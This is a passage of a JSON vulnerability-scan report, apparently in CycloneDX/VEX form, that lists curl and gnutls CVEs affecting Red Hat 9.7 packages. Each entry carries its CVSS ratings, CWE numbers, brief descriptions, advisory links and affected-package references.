          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-3783",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        522
      ],
      "description": "When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer\nperforms a redirect to a second URL, curl could leak that token to the second\nhostname under some circumstances.\n\nIf the hostname that the first request is redirected to has information in the\n.netrc file in use, via either the `machine` or the `default` keyword, curl\nwould also pass the bearer token set for the first host on to the second one.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3783"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/11/2"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3783"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3783.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3783.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-8whr-249c-vfjp"
        },
        {
          "url": "https://hackerone.com/reports/3583983"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3783"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8084-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8099-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3783"
        }
      ],
      "published": "2026-03-11T11:16:00+00:00",
      "updated": "2026-03-12T14:10:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-3784",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        305
      ],
      "description": "curl would wrongly reuse an existing HTTP proxy connection doing CONNECT to a\nserver, even if the new request uses different credentials for the HTTP proxy.\nThe proper behavior is to create or use a separate connection.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3784"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/11/3"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3784"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3784.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3784.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-5q3w-6p3j-mw6p"
        },
        {
          "url": "https://hackerone.com/reports/3584903"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3784"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8084-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8099-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3784"
        }
      ],
      "published": "2026-03-11T11:16:00+00:00",
      "updated": "2026-03-12T14:09:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-3805",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416
      ],
      "description": "When doing a second SMB request to the same host again, curl would wrongly use\na data pointer pointing into already freed memory.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3805"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/11/4"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3805"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3805.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3805.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-2289-hhfc-p684"
        },
        {
          "url": "https://hackerone.com/reports/3591944"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3805"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8084-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3805"
        }
      ],
      "published": "2026-03-11T11:16:00+00:00",
      "updated": "2026-03-12T14:08:56+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-3832",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
        }
      ],
      "cwes": [
        179
      ],
      "description": "A flaw was found in gnutls. A remote attacker could exploit this vulnerability by presenting a specially crafted Online Certificate Status Protocol (OCSP) response during a TLS handshake. Due to a logic error in how gnutls processes multi-record OCSP responses, a client with OCSP verification enabled may incorrectly accept a revoked server certificate, potentially leading to a compromise of trust.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3832"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:13274"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3832"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445762"
        },
        {
          "url": "https://gitlab.com/gnutls/gnutls/-/issues/1801"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3832"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3832"
        }
      ],
      "published": "2026-04-30T18:16:30+00:00",
      "updated": "2026-05-11T19:15:57+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.8.3-10.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
